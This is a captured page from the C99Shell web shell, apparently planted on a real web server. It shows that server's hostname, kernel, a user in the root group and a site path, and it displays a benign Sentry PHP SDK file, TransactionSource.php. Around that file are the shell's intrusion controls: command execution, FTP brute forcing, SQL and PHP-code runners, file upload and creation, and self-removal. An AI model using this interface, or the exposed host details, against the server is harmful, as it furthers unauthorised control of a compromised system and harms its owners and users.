!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/sentry/sentry/src/Tracing/   drwxr-xr-x
Free 29.13 GB of 117.98 GB (24.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     TransactionSource.php (1.82 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Sentry\Tracing;

/**
 * This enum represents all the possible types of transaction sources.
 *
 * @see https://develop.sentry.dev/sdk/event-payloads/transaction/#transaction-annotations
 */
final class TransactionSource implements \Stringable
{
    
/**
     * @var string The value of the enum instance
     */
    
private $value;

    
/**
     * @var array<string, self> A list of cached enum instances
     */
    
private static $instances = [];

    private function 
__construct(string $value)
    {
        
$this->value $value;
    }

    
/**
     * User-defined name.
     */
    
public static function custom(): self
    
{
        return 
self::getInstance('custom');
    }

    
/**
     * Raw URL, potentially containing identifiers.
     */
    
public static function url(): self
    
{
        return 
self::getInstance('url');
    }

    
/**
     * Parametrized URL / route.
     */
    
public static function route(): self
    
{
        return 
self::getInstance('route');
    }

    
/**
     * Name of the view handling the request.
     */
    
public static function view(): self
    
{
        return 
self::getInstance('view');
    }

    
/**
     * Named after a software component, such as a function or class name.
     */
    
public static function component(): self
    
{
        return 
self::getInstance('component');
    }

    
/**
     * Name of a background task (e.g. a Celery task).
     */
    
public static function task(): self
    
{
        return 
self::getInstance('task');
    }

    public function 
__toString(): string
    
{
        return 
$this->value;
    }

    private static function 
getInstance(string $value): self
    
{
        if (!isset(
self::$instances[$value])) {
            
self::$instances[$value] = new self($value);
        }

        return 
self::$instances[$value];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.003 ]--